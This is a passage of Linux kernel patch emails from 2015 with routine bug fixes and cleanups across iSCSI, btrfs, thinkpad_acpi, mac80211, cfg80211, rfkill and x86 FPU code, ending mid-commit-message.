Reported-by: Alexey Khoroshilov Signed-off-by: Nicholas Bellinger --- drivers/target/iscsi/iscsi_target.c | 2 +- drivers/target/iscsi/iscsi_target_tpg.c | 5 +---- drivers/target/target_core_sbc.c | 2 +- 3 files changed, 3 insertions(+), 6 deletions(-) diff --git a/drivers/target/iscsi/iscsi_target.c b/drivers/target/iscsi/iscsi_target.c index 34871a628b11..74e6114ff18f 100644 --- a/drivers/target/iscsi/iscsi_target.c +++ b/drivers/target/iscsi/iscsi_target.c @@ -230,7 +230,7 @@ int iscsit_access_np(struct iscsi_np *np, struct iscsi_portal_group *tpg) * Here we serialize access across the TIQN+TPG Tuple. */ ret = down_interruptible(&tpg->np_login_sem); - if ((ret != 0) || signal_pending(current)) + if (ret != 0) return -1; spin_lock_bh(&tpg->tpg_state_lock); diff --git a/drivers/target/iscsi/iscsi_target_tpg.c b/drivers/target/iscsi/iscsi_target_tpg.c index e8a240818353..5e3295fe404d 100644 --- a/drivers/target/iscsi/iscsi_target_tpg.c +++ b/drivers/target/iscsi/iscsi_target_tpg.c @@ -161,10 +161,7 @@ struct iscsi_portal_group *iscsit_get_tpg_from_np( int iscsit_get_tpg( struct iscsi_portal_group *tpg) { - int ret; - - ret = mutex_lock_interruptible(&tpg->tpg_access_lock); - return ((ret != 0) || signal_pending(current)) ? -1 : 0; + return mutex_lock_interruptible(&tpg->tpg_access_lock); } void iscsit_put_tpg(struct iscsi_portal_group *tpg) diff --git a/drivers/target/target_core_sbc.c b/drivers/target/target_core_sbc.c index 8855781ac653..733824e3825f 100644 --- a/drivers/target/target_core_sbc.c +++ b/drivers/target/target_core_sbc.c @@ -568,7 +568,7 @@ sbc_compare_and_write(struct se_cmd *cmd) * comparision using SGLs at cmd->t_bidi_data_sg.. */ rc = down_interruptible(&dev->caw_sem); - if ((rc != 0) || signal_pending(current)) { + if (rc != 0) { cmd->transport_complete_callback = NULL; return TCM_LOGICAL_UNIT_COMMUNICATION_FAILURE; } From 2c2ed5aa0154c0be67f98c970de6b5587dbc045a Mon Sep 17 00:00:00 2001 From: Mark Fasheh Date: Tue, 19 May 2015 12:49:50 -0700 Subject: [PATCH 118/872] btrfs: clear 'ret' in btrfs_check_shared() loop btrfs_check_shared() is leaking a return value of '1' from find_parent_nodes(). As a result, callers (in this case, extent_fiemap()) are told extents are shared when they are not. This in turn broke fiemap on btrfs for kernels v3.18 and up. The fix is simple - we just have to clear 'ret' after we are done processing the results of find_parent_nodes(). It wasn't clear to me at first what was happening with return values in btrfs_check_shared() and find_parent_nodes() - thanks to Josef for the help on irc. I added documentation to both functions to make things more clear for the next hacker who might come across them. If we could queue this up for -stable too that would be great. Signed-off-by: Mark Fasheh Reviewed-by: Josef Bacik Signed-off-by: Chris Mason --- fs/btrfs/backref.c | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) diff --git a/fs/btrfs/backref.c b/fs/btrfs/backref.c index 9de772ee0031..614aaa1969bd 100644 --- a/fs/btrfs/backref.c +++ b/fs/btrfs/backref.c @@ -880,6 +880,8 @@ static int __add_keyed_refs(struct btrfs_fs_info *fs_info, * indirect refs to their parent bytenr. 
* When roots are found, they're added to the roots list * + * NOTE: This can return values > 0 + * * FIXME some caching might speed things up */ static int find_parent_nodes(struct btrfs_trans_handle *trans, @@ -1198,6 +1200,19 @@ int btrfs_find_all_roots(struct btrfs_trans_handle *trans, return ret; } +/** + * btrfs_check_shared - tell us whether an extent is shared + * + * @trans: optional trans handle + * + * btrfs_check_shared uses the backref walking code but will short + * circuit as soon as it finds a root or inode that doesn't match the + * one passed in. This provides a significant performance benefit for + * callers (such as fiemap) which want to know whether the extent is + * shared but do not need a ref count. + * + * Return: 0 if extent is not shared, 1 if it is shared, < 0 on error. + */ int btrfs_check_shared(struct btrfs_trans_handle *trans, struct btrfs_fs_info *fs_info, u64 root_objectid, u64 inum, u64 bytenr) @@ -1226,11 +1241,13 @@ int btrfs_check_shared(struct btrfs_trans_handle *trans, ret = find_parent_nodes(trans, fs_info, bytenr, elem.seq, tmp, roots, NULL, root_objectid, inum); if (ret == BACKREF_FOUND_SHARED) { + /* this is the only condition under which we return 1 */ ret = 1; break; } if (ret < 0 && ret != -ENOENT) break; + ret = 0; node = ulist_next(tmp, &uiter); if (!node) break; From a96295965b600f2dc6ad661c4803c86e87db3d7b Mon Sep 17 00:00:00 2001 From: Filipe Manana Date: Mon, 18 May 2015 19:11:40 +0100 Subject: [PATCH 119/872] Btrfs: fix racy system chunk allocation when setting block group ro If while setting a block group read-only we end up allocating a system chunk, through check_system_chunk(), we were not doing it while holding the chunk mutex which is a problem if a concurrent chunk allocation is happening, through do_chunk_alloc(), as it means both block groups can end up using the same logical addresses and physical regions in the device(s). So make sure we hold the chunk mutex. 
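Besides taking the lock in btrfs_set_block_group_ro(), the patch documents the invariant by asserting the chunk mutex in btrfs_alloc_chunk(). The general pattern, sketched here with generic names and a plain WARN_ON() instead of btrfs' own ASSERT():

#include <linux/bug.h>
#include <linux/mutex.h>

static DEFINE_MUTEX(foo_chunk_mutex);

static void foo_alloc_chunk(void)
{
	/* Catch callers that forgot to take the lock. */
	WARN_ON(!mutex_is_locked(&foo_chunk_mutex));

	/* ... allocation work that relies on foo_chunk_mutex ... */
}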
Cc: stable@vger.kernel.org # 4.0+ Fixes: 2f0810880f08 ("btrfs: delete chunk allocation attemp when setting block group ro") Signed-off-by: Filipe Manana Signed-off-by: Chris Mason --- fs/btrfs/extent-tree.c | 2 ++ fs/btrfs/volumes.c | 1 + 2 files changed, 3 insertions(+) diff --git a/fs/btrfs/extent-tree.c b/fs/btrfs/extent-tree.c index 7effed6f2fa6..45e3f086790b 100644 --- a/fs/btrfs/extent-tree.c +++ b/fs/btrfs/extent-tree.c @@ -8842,7 +8842,9 @@ int btrfs_set_block_group_ro(struct btrfs_root *root, out: if (cache->flags & BTRFS_BLOCK_GROUP_SYSTEM) { alloc_flags = update_block_group_flags(root, cache->flags); + lock_chunks(root->fs_info->chunk_root); check_system_chunk(trans, root, alloc_flags); + unlock_chunks(root->fs_info->chunk_root); } mutex_unlock(&root->fs_info->ro_block_group_mutex); diff --git a/fs/btrfs/volumes.c b/fs/btrfs/volumes.c index 96aebf3bcd5b..174f5e1e00ab 100644 --- a/fs/btrfs/volumes.c +++ b/fs/btrfs/volumes.c @@ -4625,6 +4625,7 @@ int btrfs_alloc_chunk(struct btrfs_trans_handle *trans, { u64 chunk_offset; + ASSERT(mutex_is_locked(&extent_root->fs_info->chunk_mutex)); chunk_offset = find_next_chunk(extent_root->fs_info); return __btrfs_alloc_chunk(trans, extent_root, chunk_offset, type); } From 5fb73bc2c8301ad106df0e858e60875cd2ae95cb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Bj=C3=B8rn=20Mork?= Date: Tue, 19 May 2015 19:45:03 +0200 Subject: [PATCH 120/872] thinkpad_acpi: Revert unintentional device attribute renaming MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The conversion to DEVICE_ATTR_* macros failed to fixup a few cases where the old attribute names didn't match the show/store function names. Instead of renaming the functions, the attributes were renamed. This caused an unintentional API change. The hwmon required 'name' attribute were among the renamed attribute, causing libsensors to fail to detect the hwmon device at all. Fix by using the DEVICE_ATTR macro for these attributes, allowing the show/store functions to keep their system specific prefixes. 
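To make the rename mechanics clearer, here is an editorial sketch (hypothetical foo/bar attributes, not code from the patch): DEVICE_ATTR_RO() derives both the sysfs file name and the expected callback name from its single argument, while the older DEVICE_ATTR() lets the two differ, which is what this fix uses to restore the original file names.

#include <linux/device.h>
#include <linux/kernel.h>
#include <linux/sysfs.h>

/* DEVICE_ATTR_RO(foo) defines dev_attr_foo, creates a sysfs file named
 * "foo" and expects a callback named foo_show().
 */
static ssize_t foo_show(struct device *dev, struct device_attribute *attr,
			char *buf)
{
	return sprintf(buf, "%d\n", 42);
}
static DEVICE_ATTR_RO(foo);

/* DEVICE_ATTR() decouples the two: the sysfs file is named "bar", while
 * the callback keeps its own prefix.
 */
static DEVICE_ATTR(bar, S_IRUGO, foo_show, NULL);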
Fixes: b4dd04ac6ef8 ("thinkpad_acpi: use DEVICE_ATTR_* macros") Cc: Bastien Nocera Signed-off-by: Bjørn Mork Acked-by: Henrique de Moraes Holschuh Signed-off-by: Darren Hart --- drivers/platform/x86/thinkpad_acpi.c | 37 ++++++++++++++-------------- 1 file changed, 19 insertions(+), 18 deletions(-) diff --git a/drivers/platform/x86/thinkpad_acpi.c b/drivers/platform/x86/thinkpad_acpi.c index 9bb9ad6d4a1b..28f328136f0d 100644 --- a/drivers/platform/x86/thinkpad_acpi.c +++ b/drivers/platform/x86/thinkpad_acpi.c @@ -2897,7 +2897,7 @@ static ssize_t hotkey_wakeup_reason_show(struct device *dev, return snprintf(buf, PAGE_SIZE, "%d\n", hotkey_wakeup_reason); } -static DEVICE_ATTR_RO(hotkey_wakeup_reason); +static DEVICE_ATTR(wakeup_reason, S_IRUGO, hotkey_wakeup_reason_show, NULL); static void hotkey_wakeup_reason_notify_change(void) { @@ -2913,7 +2913,8 @@ static ssize_t hotkey_wakeup_hotunplug_complete_show(struct device *dev, return snprintf(buf, PAGE_SIZE, "%d\n", hotkey_autosleep_ack); } -static DEVICE_ATTR_RO(hotkey_wakeup_hotunplug_complete); +static DEVICE_ATTR(wakeup_hotunplug_complete, S_IRUGO, + hotkey_wakeup_hotunplug_complete_show, NULL); static void hotkey_wakeup_hotunplug_complete_notify_change(void) { @@ -2978,8 +2979,8 @@ static struct attribute *hotkey_attributes[] __initdata = { &dev_attr_hotkey_enable.attr, &dev_attr_hotkey_bios_enabled.attr, &dev_attr_hotkey_bios_mask.attr, - &dev_attr_hotkey_wakeup_reason.attr, - &dev_attr_hotkey_wakeup_hotunplug_complete.attr, + &dev_attr_wakeup_reason.attr, + &dev_attr_wakeup_hotunplug_complete.attr, &dev_attr_hotkey_mask.attr, &dev_attr_hotkey_all_mask.attr, &dev_attr_hotkey_recommended_mask.attr, @@ -4393,12 +4394,13 @@ static ssize_t wan_enable_store(struct device *dev, attr, buf, count); } -static DEVICE_ATTR_RW(wan_enable); +static DEVICE_ATTR(wwan_enable, S_IWUSR | S_IRUGO, + wan_enable_show, wan_enable_store); /* --------------------------------------------------------------------- */ static struct attribute *wan_attributes[] = { - &dev_attr_wan_enable.attr, + &dev_attr_wwan_enable.attr, NULL }; @@ -8138,7 +8140,8 @@ static ssize_t fan_pwm1_enable_store(struct device *dev, return count; } -static DEVICE_ATTR_RW(fan_pwm1_enable); +static DEVICE_ATTR(pwm1_enable, S_IWUSR | S_IRUGO, + fan_pwm1_enable_show, fan_pwm1_enable_store); /* sysfs fan pwm1 ------------------------------------------------------ */ static ssize_t fan_pwm1_show(struct device *dev, @@ -8198,7 +8201,7 @@ static ssize_t fan_pwm1_store(struct device *dev, return (rc) ? 
rc : count; } -static DEVICE_ATTR_RW(fan_pwm1); +static DEVICE_ATTR(pwm1, S_IWUSR | S_IRUGO, fan_pwm1_show, fan_pwm1_store); /* sysfs fan fan1_input ------------------------------------------------ */ static ssize_t fan_fan1_input_show(struct device *dev, @@ -8215,7 +8218,7 @@ static ssize_t fan_fan1_input_show(struct device *dev, return snprintf(buf, PAGE_SIZE, "%u\n", speed); } -static DEVICE_ATTR_RO(fan_fan1_input); +static DEVICE_ATTR(fan1_input, S_IRUGO, fan_fan1_input_show, NULL); /* sysfs fan fan2_input ------------------------------------------------ */ static ssize_t fan_fan2_input_show(struct device *dev, @@ -8232,7 +8235,7 @@ static ssize_t fan_fan2_input_show(struct device *dev, return snprintf(buf, PAGE_SIZE, "%u\n", speed); } -static DEVICE_ATTR_RO(fan_fan2_input); +static DEVICE_ATTR(fan2_input, S_IRUGO, fan_fan2_input_show, NULL); /* sysfs fan fan_watchdog (hwmon driver) ------------------------------- */ static ssize_t fan_fan_watchdog_show(struct device_driver *drv, @@ -8265,8 +8268,8 @@ static DRIVER_ATTR(fan_watchdog, S_IWUSR | S_IRUGO, /* --------------------------------------------------------------------- */ static struct attribute *fan_attributes[] = { - &dev_attr_fan_pwm1_enable.attr, &dev_attr_fan_pwm1.attr, - &dev_attr_fan_fan1_input.attr, + &dev_attr_pwm1_enable.attr, &dev_attr_pwm1.attr, + &dev_attr_fan1_input.attr, NULL, /* for fan2_input */ NULL }; @@ -8400,7 +8403,7 @@ static int __init fan_init(struct ibm_init_struct *iibm) if (tp_features.second_fan) { /* attach second fan tachometer */ fan_attributes[ARRAY_SIZE(fan_attributes)-2] = - &dev_attr_fan_fan2_input.attr; + &dev_attr_fan2_input.attr; } rc = sysfs_create_group(&tpacpi_sensors_pdev->dev.kobj, &fan_attr_group); @@ -8848,7 +8851,7 @@ static ssize_t thinkpad_acpi_pdev_name_show(struct device *dev, return snprintf(buf, PAGE_SIZE, "%s\n", TPACPI_NAME); } -static DEVICE_ATTR_RO(thinkpad_acpi_pdev_name); +static DEVICE_ATTR(name, S_IRUGO, thinkpad_acpi_pdev_name_show, NULL); /* --------------------------------------------------------------------- */ @@ -9390,8 +9393,7 @@ static void thinkpad_acpi_module_exit(void) hwmon_device_unregister(tpacpi_hwmon); if (tp_features.sensors_pdev_attrs_registered) - device_remove_file(&tpacpi_sensors_pdev->dev, - &dev_attr_thinkpad_acpi_pdev_name); + device_remove_file(&tpacpi_sensors_pdev->dev, &dev_attr_name); if (tpacpi_sensors_pdev) platform_device_unregister(tpacpi_sensors_pdev); if (tpacpi_pdev) @@ -9512,8 +9514,7 @@ static int __init thinkpad_acpi_module_init(void) thinkpad_acpi_module_exit(); return ret; } - ret = device_create_file(&tpacpi_sensors_pdev->dev, - &dev_attr_thinkpad_acpi_pdev_name); + ret = device_create_file(&tpacpi_sensors_pdev->dev, &dev_attr_name); if (ret) { pr_err("unable to create sysfs hwmon device attributes\n"); thinkpad_acpi_module_exit(); From 94c78cb4523c246ec37959436f04e7c946f7494b Mon Sep 17 00:00:00 2001 From: Johannes Berg Date: Wed, 20 May 2015 11:31:47 +0200 Subject: [PATCH 121/872] mac80211: fix memory leak My recent change here introduced a possible memory leak if the driver registers an invalid cipher schemes. This won't really happen in practice, but fix the leak nonetheless. 
Fixes: e3a55b5399d55 ("mac80211: validate cipher scheme PN length better") Signed-off-by: Johannes Berg --- net/mac80211/main.c | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/net/mac80211/main.c b/net/mac80211/main.c index 3c956c5f99b2..99d27babd9f0 100644 --- a/net/mac80211/main.c +++ b/net/mac80211/main.c @@ -770,8 +770,10 @@ static int ieee80211_init_cipher_suites(struct ieee80211_local *local) for (r = 0; r < local->hw.n_cipher_schemes; r++) { suites[w++] = cs[r].cipher; - if (WARN_ON(cs[r].pn_len > IEEE80211_MAX_PN_LEN)) + if (WARN_ON(cs[r].pn_len > IEEE80211_MAX_PN_LEN)) { + kfree(suites); return -EINVAL; + } } } From 179655fcd2f40edeae515da1f4361c7ddc56b8ed Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Wed, 20 May 2015 09:27:03 +0200 Subject: [PATCH 122/872] at86rf230: add missing cca ed level values This patch add missing values for at86rf212 ed level values. Currently there are 15 values and the register setting supports 16 different ed level values. Signed-off-by: Alexander Aring Reported-by: Craig Younkins Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/at86rf230.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/ieee802154/at86rf230.c b/drivers/net/ieee802154/at86rf230.c index d417ceb67626..2f25a5ed8247 100644 --- a/drivers/net/ieee802154/at86rf230.c +++ b/drivers/net/ieee802154/at86rf230.c @@ -892,12 +892,12 @@ static const s32 at86rf23x_ed_levels[AT86RF2XX_MAX_ED_LEVELS + 1] = { static const s32 at86rf212_ed_levels_100[AT86RF2XX_MAX_ED_LEVELS + 1] = { -10000, -9800, -9600, -9400, -9200, -9000, -8800, -8600, -8400, -8200, - -8000, -7800, -7600, -7400, -7200, + -8000, -7800, -7600, -7400, -7200, -7000, }; static const s32 at86rf212_ed_levels_98[AT86RF2XX_MAX_ED_LEVELS + 1] = { -9800, -9600, -9400, -9200, -9000, -8800, -8600, -8400, -8200, -8000, - -7800, -7600, -7400, -7200, -7000, + -7800, -7600, -7400, -7200, -7000, -6800, }; static inline int From e88221c50cadade0eb4f7f149f4967d760212695 Mon Sep 17 00:00:00 2001 From: Ingo Molnar Date: Wed, 20 May 2015 11:45:30 +0200 Subject: [PATCH 123/872] x86/fpu: Disable XSAVES* support for now The kernel's handling of 'compacted' xsave state layout is buggy: http://marc.info/?l=linux-kernel&m=142967852317199 I don't have such a system, and the description there is vague, but from extrapolation I guess that there were two kinds of bugs observed: - boot crashes, due to size calculations being wrong and the dynamic allocation allocating a too small xstate area. (This is now fixed in the new FPU code - but still present in stable kernels.) - FPU state corruption and ABI breakage: if signal handlers try to change the FPU state in standard format, which then the kernel tries to restore in the compacted format. These breakages are scary, but they only occur on a small number of systems that have XSAVES* CPU support. Yet we have had XSAVES support in the upstream kernel for a large number of stable kernel releases, and the fixes are involved and unproven. So do the safe resolution first: disable XSAVES* support and only use the standard xstate format. This makes the code work and is easy to backport. On top of this we can work on enabling (and testing!) proper compacted format support, without backporting pressure, on top of the new, cleaned up FPU code. Cc: Cc: Andy Lutomirski Cc: Borislav Petkov Cc: Dave Hansen Cc: Fenghua Yu Cc: H. 
Peter Anvin Cc: Linus Torvalds Cc: Oleg Nesterov Cc: Peter Zijlstra Cc: Thomas Gleixner Signed-off-by: Ingo Molnar --- arch/x86/kernel/i387.c | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/arch/x86/kernel/i387.c b/arch/x86/kernel/i387.c index 009183276bb7..6185d3141219 100644 --- a/arch/x86/kernel/i387.c +++ b/arch/x86/kernel/i387.c @@ -173,6 +173,21 @@ static void init_thread_xstate(void) xstate_size = sizeof(struct i387_fxsave_struct); else xstate_size = sizeof(struct i387_fsave_struct); + + /* + * Quirk: we don't yet handle the XSAVES* instructions + * correctly, as we don't correctly convert between + * standard and compacted format when interfacing + * with user-space - so disable it for now. + * + * The difference is small: with recent CPUs the + * compacted format is only marginally smaller than + * the standard FPU state format. + * + * ( This is easy to backport while we are fixing + * XSAVES* support. ) + */ + setup_clear_cpu_cap(X86_FEATURE_XSAVES); } /* From 28f297a7af7e00500d72e6c0421c7e10ec96f627 Mon Sep 17 00:00:00 2001 From: Lars-Peter Clausen Date: Sat, 16 May 2015 14:23:55 +0200 Subject: [PATCH 124/872] net: rfkill: Switch to PM ops Use dev_pm_ops instead of the legacy suspend/resume callbacks for the rfkill class suspend and resume operations. Signed-off-by: Lars-Peter Clausen Signed-off-by: Johannes Berg --- net/rfkill/core.c | 12 +++++++++--- 1 file changed, 9 insertions(+), 3 deletions(-) diff --git a/net/rfkill/core.c b/net/rfkill/core.c index fa7cd792791c..f12149a29cb1 100644 --- a/net/rfkill/core.c +++ b/net/rfkill/core.c @@ -794,7 +794,8 @@ void rfkill_resume_polling(struct rfkill *rfkill) } EXPORT_SYMBOL(rfkill_resume_polling); -static int rfkill_suspend(struct device *dev, pm_message_t state) +#ifdef CONFIG_PM_SLEEP +static int rfkill_suspend(struct device *dev) { struct rfkill *rfkill = to_rfkill(dev); @@ -818,13 +819,18 @@ static int rfkill_resume(struct device *dev) return 0; } +static SIMPLE_DEV_PM_OPS(rfkill_pm_ops, rfkill_suspend, rfkill_resume); +#define RFKILL_PM_OPS (&rfkill_pm_ops) +#else +#define RFKILL_PM_OPS NULL +#endif + static struct class rfkill_class = { .name = "rfkill", .dev_release = rfkill_release, .dev_groups = rfkill_dev_groups, .dev_uevent = rfkill_dev_uevent, - .suspend = rfkill_suspend, - .resume = rfkill_resume, + .pm = RFKILL_PM_OPS, }; bool rfkill_blocked(struct rfkill *rfkill) From 262918d847c0f66a0ec05db9de7571ed72e422af Mon Sep 17 00:00:00 2001 From: Lars-Peter Clausen Date: Sat, 16 May 2015 14:35:54 +0200 Subject: [PATCH 125/872] cfg80211: Switch to PM ops Use dev_pm_ops instead of the legacy suspend/resume callbacks for the wiphy class suspend and resume operations. 
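For context (an illustrative sketch, not from the patch): the legacy class suspend callback took an extra pm_message_t argument, while dev_pm_ops callbacks take only the device; SIMPLE_DEV_PM_OPS() fills the system-sleep slots (suspend, resume, freeze, thaw, poweroff, restore) from a single pair when CONFIG_PM_SLEEP is enabled. A minimal pattern for a hypothetical class:

#include <linux/device.h>
#include <linux/pm.h>

#ifdef CONFIG_PM_SLEEP
static int foo_suspend(struct device *dev)
{
	/* quiesce whatever this device represents */
	return 0;
}

static int foo_resume(struct device *dev)
{
	/* bring it back up */
	return 0;
}

static SIMPLE_DEV_PM_OPS(foo_pm_ops, foo_suspend, foo_resume);
#define FOO_PM_OPS (&foo_pm_ops)
#else
#define FOO_PM_OPS NULL
#endif

static struct class foo_class = {
	.name = "foo",
	.pm = FOO_PM_OPS,
};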
Signed-off-by: Lars-Peter Clausen Signed-off-by: Johannes Berg --- net/wireless/sysfs.c | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/net/wireless/sysfs.c b/net/wireless/sysfs.c index 9ee6bc1a7610..9cee0220665d 100644 --- a/net/wireless/sysfs.c +++ b/net/wireless/sysfs.c @@ -86,7 +86,7 @@ static int wiphy_uevent(struct device *dev, struct kobj_uevent_env *env) return 0; } -#ifdef CONFIG_PM +#ifdef CONFIG_PM_SLEEP static void cfg80211_leave_all(struct cfg80211_registered_device *rdev) { struct wireless_dev *wdev; @@ -95,7 +95,7 @@ static void cfg80211_leave_all(struct cfg80211_registered_device *rdev) cfg80211_leave(rdev, wdev); } -static int wiphy_suspend(struct device *dev, pm_message_t state) +static int wiphy_suspend(struct device *dev) { struct cfg80211_registered_device *rdev = dev_to_rdev(dev); int ret = 0; @@ -136,6 +136,11 @@ static int wiphy_resume(struct device *dev) return ret; } + +static SIMPLE_DEV_PM_OPS(wiphy_pm_ops, wiphy_suspend, wiphy_resume); +#define WIPHY_PM_OPS (&wiphy_pm_ops) +#else +#define WIPHY_PM_OPS NULL #endif static const void *wiphy_namespace(struct device *d) @@ -151,10 +156,7 @@ struct class ieee80211_class = { .dev_release = wiphy_dev_release, .dev_groups = ieee80211_groups, .dev_uevent = wiphy_uevent, -#ifdef CONFIG_PM - .suspend = wiphy_suspend, - .resume = wiphy_resume, -#endif + .pm = WIPHY_PM_OPS, .ns_type = &net_ns_type_operations, .namespace = wiphy_namespace, }; From f8bdbb584749420da1a7fea8cc1df18e5c2c4d6c Mon Sep 17 00:00:00 2001 From: Johannes Berg Date: Wed, 20 May 2015 15:04:53 +0200 Subject: [PATCH 126/872] mac80211: add missing drv_priv description for TXQ struct The kernel-doc description for the drv_priv member of struct ieee80211_txq was missing, leading to errors. Add a suitable description to fix that. Signed-off-by: Johannes Berg --- include/net/mac80211.h | 1 + 1 file changed, 1 insertion(+) diff --git a/include/net/mac80211.h b/include/net/mac80211.h index 67e0df14ba0f..887fe95b9805 100644 --- a/include/net/mac80211.h +++ b/include/net/mac80211.h @@ -1728,6 +1728,7 @@ struct ieee80211_tx_control { * @sta: station table entry, %NULL for per-vif queue * @tid: the TID for this queue (unused for per-vif queue) * @ac: the AC for this queue + * @drv_priv: driver private area, sized by hw->txq_data_size * * The driver can obtain packets from this queue by calling * ieee80211_tx_dequeue(). From 464daaf04cb633ae1530652fd23cdea0f0d21dd5 Mon Sep 17 00:00:00 2001 From: Michal Kazior Date: Tue, 19 May 2015 14:13:36 +0200 Subject: [PATCH 127/872] mac80211: check fast-xmit on station change Drivers with fast-xmit (e.g. ath10k) running in AP_VLAN setups would fail to communicate with connected 4addr stations. The reason was when new station associates it first goes into master AP interface. It is not until later that a dedicated AP_VLAN is created for it and the station itself is moved there. After that Tx directed at the station should use 4addr header. However fast-xmit wasn't recalculated and 3addr header remained to be used. This in turn caused the connected 4addr stations to drop packets coming from the AP until some other event would cause fast-xmit to recalculate for that station (which could never come). 
Signed-off-by: Michal Kazior Signed-off-by: Johannes Berg --- net/mac80211/cfg.c | 1 + 1 file changed, 1 insertion(+) diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c index 3469bbdc891c..bb9f83640b46 100644 --- a/net/mac80211/cfg.c +++ b/net/mac80211/cfg.c @@ -1411,6 +1411,7 @@ static int ieee80211_change_station(struct wiphy *wiphy, } sta->sdata = vlansdata; + ieee80211_check_fast_xmit(sta); if (sta->sta_state == IEEE80211_STA_AUTHORIZED && prev_4addr != new_4addr) { From 252ec2b3aa6f6a9ac29c6539027db600c11bf45e Mon Sep 17 00:00:00 2001 From: Johannes Berg Date: Tue, 19 May 2015 13:36:38 +0200 Subject: [PATCH 128/872] mac80211: don't split remain-on-channel for coalescing Due to remain-on-channel scheduling delays, when we split an ROC while coalescing, we'll usually get a picture like this: existing ROC: |------------------| current time: ^ new ROC: |------| |-------| If the expected response frames are then transmitted by the peer in the hole between the two fragments of the new ROC, we miss them and the process (e.g. ANQP query) fails. mac80211 expects that the window to miss something is small: existing ROC: |------------------| new ROC: |------||-------| but that's normally not the case. To avoid this problem, coalesce only if the new ROC's duration is <= the remaining time on the existing one: existing ROC: |------------------| new ROC: |-----| and never split a new one but schedule it afterwards instead: existing ROC: |------------------| new ROC: |-------------| type=bugfix bug=not-tracked fixes=unknown Reported-by: Matti Gottlieb Reviewed-by: EliadX Peller Reviewed-by: Matti Gottlieb Tested-by: Matti Gottlieb Signed-off-by: Johannes Berg --- net/mac80211/cfg.c | 59 +++++++------------------------------- net/mac80211/ieee80211_i.h | 6 ---- 2 files changed, 11 insertions(+), 54 deletions(-) diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c index 265e42721a66..ff347a0eebd4 100644 --- a/net/mac80211/cfg.c +++ b/net/mac80211/cfg.c @@ -2495,51 +2495,22 @@ static bool ieee80211_coalesce_started_roc(struct ieee80211_local *local, struct ieee80211_roc_work *new_roc, struct ieee80211_roc_work *cur_roc) { - unsigned long j = jiffies; - unsigned long cur_roc_end = cur_roc->hw_start_time + - msecs_to_jiffies(cur_roc->duration); - struct ieee80211_roc_work *next_roc; - int new_dur; + unsigned long now = jiffies; + unsigned long remaining = cur_roc->hw_start_time + + msecs_to_jiffies(cur_roc->duration) - + now; if (WARN_ON(!cur_roc->started || !cur_roc->hw_begun)) return false; - if (time_after(j + IEEE80211_ROC_MIN_LEFT, cur_roc_end)) + /* if it doesn't fit entirely, schedule a new one */ + if (new_roc->duration > jiffies_to_msecs(remaining)) return false; ieee80211_handle_roc_started(new_roc); - new_dur = new_roc->duration - jiffies_to_msecs(cur_roc_end - j); - - /* cur_roc is long enough - add new_roc to the dependents list. */ - if (new_dur <= 0) { - list_add_tail(&new_roc->list, &cur_roc->dependents); - return true; - } - - new_roc->duration = new_dur; - - /* - * if cur_roc was already coalesced before, we might - * want to extend the next roc instead of adding - * a new one. 
- */ - next_roc = list_entry(cur_roc->list.next, - struct ieee80211_roc_work, list); - if (&next_roc->list != &local->roc_list && - next_roc->chan == new_roc->chan && - next_roc->sdata == new_roc->sdata && - !WARN_ON(next_roc->started)) { - list_add_tail(&new_roc->list, &next_roc->dependents); - next_roc->duration = max(next_roc->duration, - new_roc->duration); - next_roc->type = max(next_roc->type, new_roc->type); - return true; - } - - /* add right after cur_roc */ - list_add(&new_roc->list, &cur_roc->list); - + /* add to dependents so we send the expired event properly */ + list_add_tail(&new_roc->list, &cur_roc->dependents); return true; } @@ -2652,17 +2623,9 @@ static int ieee80211_start_roc_work(struct ieee80211_local *local, * In the offloaded ROC case, if it hasn't begun, add * this new one to the dependent list to be handled * when the master one begins. If it has begun, - * check that there's still a minimum time left and - * if so, start this one, transmitting the frame, but - * add it to the list directly after this one with - * a reduced time so we'll ask the driver to execute - * it right after finishing the previous one, in the - * hope that it'll also be executed right afterwards, - * effectively extending the old one. - * If there's no minimum time left, just add it to the - * normal list. - * TODO: the ROC type is ignored here, assuming that it - * is better to immediately use the current ROC. + * check if it fits entirely within the existing one, + * in which case it will just be dependent as well. + * Otherwise, schedule it by itself. */ if (!tmp->hw_begun) { list_add_tail(&roc->list, &tmp->dependents); diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h index cdc374296245..c0a9187bc3a9 100644 --- a/net/mac80211/ieee80211_i.h +++ b/net/mac80211/ieee80211_i.h @@ -328,12 +328,6 @@ struct mesh_preq_queue { u8 flags; }; -#if HZ/100 == 0 -#define IEEE80211_ROC_MIN_LEFT 1 -#else -#define IEEE80211_ROC_MIN_LEFT (HZ/100) -#endif - struct ieee80211_roc_work { struct list_head list; struct list_head dependents; From f9dca80b98caac8b4bfb43a2edf1e9f877ccf322 Mon Sep 17 00:00:00 2001 From: Michal Kazior Date: Wed, 13 May 2015 09:16:48 +0000 Subject: [PATCH 129/872] mac80211: fix AP_VLAN crypto tailroom calculation Some splats I was seeing: (a) WARNING: CPU: 1 PID: 0 at /devel/src/linux/net/mac80211/wep.c:102 ieee80211_wep_add_iv (b) WARNING: CPU: 1 PID: 0 at /devel/src/linux/net/mac80211/wpa.c:73 ieee80211_tx_h_michael_mic_add (c) WARNING: CPU: 3 PID: 0 at /devel/src/linux/net/mac80211/wpa.c:433 ieee80211_crypto_ccmp_encrypt I've seen (a) and (b) with ath9k hw crypto and (c) with ath9k sw crypto. All of them were related to insufficient skb tailroom and I was able to trigger these with ping6 program. AP_VLANs may inherit crypto keys from parent AP. This wasn't considered and yielded problems in some setups resulting in inability to transmit data because mac80211 wouldn't resize skbs when necessary and subsequently drop some packets due to insufficient tailroom. For efficiency purposes don't inspect both AP_VLAN and AP sdata looking for tailroom counter. Instead update AP_VLAN tailroom counters whenever their master AP tailroom counter changes. 
